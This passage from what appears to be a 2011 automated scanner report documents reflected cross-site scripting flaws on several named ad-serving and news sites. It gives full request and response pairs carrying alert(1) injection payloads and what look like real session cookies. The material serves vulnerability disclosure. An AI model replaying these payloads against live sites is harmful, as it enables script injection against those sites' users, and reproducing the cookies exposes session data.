GET /st?ad_type=pop&ad_size=0x0§ion=1421534&banned_pop_types=28&pop_times=1&pop_frequency=86400&fa4b7"-alert(1)-"af13f1e484=1 HTTP/1.1 Host: adserving.cpxinteractive.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:03:28 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Thu, 03 Feb 2011 16:03:28 GMT Pragma: no-cache Content-Length: 4400 Age: 0 Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 86400; rm_pop_times = 1; rm_pop_id = 1421534; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=28&fa4b7"-alert(1)-"af13f1e484=1&s=1421534&_salt=3329141379";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if( ...[SNIP]...
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload d1d97<img%20src%3da%20onerror%3dalert(1)>37234bbbf48 was submitted in the q parameter. This input was echoed as d1d97<img src=a onerror=alert(1)>37234bbbf48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /qsonhs.aspx?FORM=ASAPIW&q=d1d97<img%20src%3da%20onerror%3dalert(1)>37234bbbf48 HTTP/1.1 Host: api.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com/search?q=online+banking&go=&form=QBLH&qs=n&sk=&sc=8-10 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; _FP=; _HOP=; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM; RMS=F=G; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Content-Length: 79 Content-Type: application/json; charset=utf-8 X-Akamai-TestID: 2284389bc6f9439a8eeedd3f98885c17 Date: Thu, 03 Feb 2011 13:42:59 GMT Connection: close
The value of the template request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d35cb'%3balert(1)//c971cafb721 was submitted in the template parameter. This input was echoed as d35cb';alert(1)//c971cafb721 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /as/InitiateCall2.php?accountid=200106286435&template=655713d35cb'%3balert(1)//c971cafb721&checklinkstatus=1 HTTP/1.1 Host: as00.estara.com Proxy-Connection: keep-alive Referer: http://www201.americanexpress.com/business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0%22%3balert(1)//2536ed24016 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827; fscookies=b64_VcxBDsIwDATA3.QGSozt2Ie8BQWIVA4NiIb-E6Vqa3xbzXrB..AZhPFCKYByRAikLt9aWRoYvX5yfdTvnBjPvYHkt2NxvUin6dmWFBxj3-kPr3epe5hzu09loEY9miNsTRWzMcIuke0PW0EraIWskJVoJR4iYtZGWOUH
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:12:10 GMT Server: Apache P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml" Expires: Wed, 11 Nov 1998 11:11:11 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: application/x-javascript Content-Length: 10152
var wv_available = true; if (typeof(wv_available_vars) == 'undefined') wv_available_vars = new Array(); wv_available_vars['655713d35cb';alert(1)//c971cafb721'] = true;
var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_ac ...[SNIP]...
The value of the urid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46c6"%3balert(1)//6377ce7bc77 was submitted in the urid parameter. This input was echoed as b46c6";alert(1)//6377ce7bc77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /as/commonlink.php?accountid=200106286435&template=253566&urid=69799b46c6"%3balert(1)//6377ce7bc77&estara_fsguid=0DC1EAC72231C3B51F226785010C6827&host=as00.estara.com&fromrules=1&dnc=1296742159.25144911407943 HTTP/1.1 Host: as00.estara.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fscookies=b64_VcxNDsIgEAXg27CrgWF.YMFZDCpJGy0ai-e3IbYdZ-fyvXlgrbMMgdFTchBZEMAGky.tLA2Unt.53upnTownRxHJbsfBrEUaxqktyRvGdec-PF.l7mHO7TqWjlHi0exha8agNnrYRVj-sBbUglpIC2kRLXJICGqth588pnofmEicT-AF; fsserver__SESSION____SECURE__=c-7301.estara.com; fsserver__SESSION__=c-7301.estara.com; fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:59 GMT Server: Apache P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml" Expires: Wed, 11 Nov 1998 11:11:11 GMT Last-Modified: Thu, 03 Feb 2011 14:15:59 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: fscookies=b64_lY9BDoMgEEVPgzsbGGAGFm666DUatSSaKjaK9y.xVafLEjYv7-8fACmVRHBotK0UeCQDIF1RNyksCZi9z3V8xHWs0FyU9cbK-aArctCWXZ.WShdo8s4vTK8QDxjr1HZhk578mdxgT3rHNjY4DCHvIDeGG8ON5cZyQ9zQaZxjaxt8zdDHZ4nWktIVfJ7dGGxRAAh9rYcwJwFOCfACbvmiJmoDNS3R8Xf1Z69ZU5pi7r0B; expires=Tue, 02-Feb-2016 14:15:59 GMT; path=/UI/; domain=.estara.com Connection: close Content-Type: application/x-javascript Content-Length: 34262
The value of the urid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62faa'%3balert(1)//57357bc1d12 was submitted in the urid parameter. This input was echoed as 62faa';alert(1)//57357bc1d12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /as/commonlink.php?accountid=200106286435&template=253566&urid=6979962faa'%3balert(1)//57357bc1d12&estara_fsguid=0DC1EAC72231C3B51F226785010C6827&host=as00.estara.com&fromrules=1&dnc=1296742159.25144911407943 HTTP/1.1 Host: as00.estara.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fscookies=b64_VcxNDsIgEAXg27CrgWF.YMFZDCpJGy0ai-e3IbYdZ-fyvXlgrbMMgdFTchBZEMAGky.tLA2Unt.53upnTownRxHJbsfBrEUaxqktyRvGdec-PF.l7mHO7TqWjlHi0exha8agNnrYRVj-sBbUglpIC2kRLXJICGqth588pnofmEicT-AF; fsserver__SESSION____SECURE__=c-7301.estara.com; fsserver__SESSION__=c-7301.estara.com; fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:59 GMT Server: Apache P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml" Expires: Wed, 11 Nov 1998 11:11:11 GMT Last-Modified: Thu, 03 Feb 2011 14:15:59 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: fscookies=b64_lY9BDsIgEEVPQ3caGJgZWLBx4TUMVYyNLTUV729TtY5LCZuX9-8PgNZGE3hyFqOBQOwAtG9SW-O9grCHKZVTeQyR3NZgcKg-h3wzB3Fz6eo92obcvPML4y2XFYZUj5e8yMDhm1zgkwxebCywGibZIWmcNE4alAalYWn4a7wXawu8Td.V64YQ2dgIr2cTnFNSwMruUp.nqsAbBUHBfr7IFrk9mpOB9e-mz177qHUsc.8J; expires=Tue, 02-Feb-2016 14:15:59 GMT; path=/UI/; domain=.estara.com Connection: close Content-Type: application/x-javascript Content-Length: 34262
var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_accountid"]=" ...[SNIP]... =500;wv_vars["ui_height"]=500;wv_start(wv_argscopy);wv_vars["ui_width"]=prev_ui_width;wv_vars["ui_height"]=prev_ui_height;}setTimeout('eStaraCookieDictionaryDelete(\'estaracookie\', \'rule_action_6979962faa';alert(1)//57357bc1d12\', true, null);', 1000);var wv_available = true; if (typeof(wv_available_vars) == 'undefined') wv_available_vars = new Array(); wv_available_vars['253566'] = true; if (typeof(wv_vars)=="undefined") ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload f8470<script>alert(1)</script>d3eebd4205c was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2f8470<script>alert(1)</script>d3eebd4205c&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:20 GMT Date: Thu, 03 Feb 2011 16:08:20 GMT Connection: close Content-Length: 3587
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 961a2<script>alert(1)</script>f667e8d66a2 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=9319&c5=&c6=&c10=3209360961a2<script>alert(1)</script>f667e8d66a2&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;c1=uncategorized;ord=3300234652124345.5? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 18:53:46 GMT Date: Thu, 03 Feb 2011 18:53:46 GMT Connection: close Content-Length: 3593
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 78a58<script>alert(1)</script>157d4440e69 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=&c6=&c15=78a58<script>alert(1)</script>157d4440e69 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:24 GMT Date: Thu, 03 Feb 2011 16:08:24 GMT Connection: close Content-Length: 3587
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 45f85<script>alert(1)</script>5d73e5872e0 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=603578645f85<script>alert(1)</script>5d73e5872e0&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:20 GMT Date: Thu, 03 Feb 2011 16:08:20 GMT Connection: close Content-Length: 3587
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c039a<script>alert(1)</script>445d1c22264 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786c039a<script>alert(1)</script>445d1c22264&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:21 GMT Date: Thu, 03 Feb 2011 16:08:21 GMT Connection: close Content-Length: 3587
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 257a9<script>alert(1)</script>4757a91e5f0 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=257a9<script>alert(1)</script>4757a91e5f0&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:22 GMT Date: Thu, 03 Feb 2011 16:08:22 GMT Connection: close Content-Length: 3587
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1f462<script>alert(1)</script>398a6a54a7c was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=1f462<script>alert(1)</script>398a6a54a7c&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:22 GMT Date: Thu, 03 Feb 2011 16:08:22 GMT Connection: close Content-Length: 3587
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6daaf<script>alert(1)</script>1ad5ede9ace was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=&c6=6daaf<script>alert(1)</script>1ad5ede9ace&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Thu, 10 Feb 2011 16:08:23 GMT Date: Thu, 03 Feb 2011 16:08:23 GMT Connection: close Content-Length: 3587
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71024'%3balert(1)//daafc6b74fc was submitted in the admeld_adprovider_id parameter. This input was echoed as 71024';alert(1)//daafc6b74fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=871024'%3balert(1)//daafc6b74fc&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1
Response
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:17 GMT; Path=/ Pragma: no-cache Cache-Control: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 190 Date: Thu, 03 Feb 2011 18:54:17 GMT
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ad9f'%3balert(1)//03ee31b5e06 was submitted in the admeld_callback parameter. This input was echoed as 9ad9f';alert(1)//03ee31b5e06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9ad9f'%3balert(1)//03ee31b5e06 HTTP/1.1 Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1
Response
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:28 GMT; Path=/ Pragma: no-cache Cache-Control: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 190 Date: Thu, 03 Feb 2011 18:54:27 GMT
1.79. http://business-news.thestreet.com/ocregister [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://business-news.thestreet.com
Path: /ocregister
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b12"><script>alert(1)</script>c8944471237 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ocregister?b9b12"><script>alert(1)</script>c8944471237=1 HTTP/1.1 Host: business-news.thestreet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=0 Last-Modified: Thu, 03 Feb 2011 19:04:36 +0000 Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie, Accept-Encoding ETag: "1296759876" Content-Type: text/html; charset=utf-8 Content-Length: 65305 X-Served-By: pmisccache01.dc.thestreet.com Date: Thu, 03 Feb 2011 19:04:38 GMT X-Varnish: 209384145 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- Date Created: 20110203 14:04:38 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <a href="/ocregister?b9b12"><script>alert(1)</script>c8944471237=1/story/10-terrible-financial-choices-in-music-history/10993786"> ...[SNIP]...
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 693e2"%3balert(1)//dacff80c547 was submitted in the $ parameter. This input was echoed as 693e2";alert(1)//dacff80c547 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=693e2"%3balert(1)//dacff80c547&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; 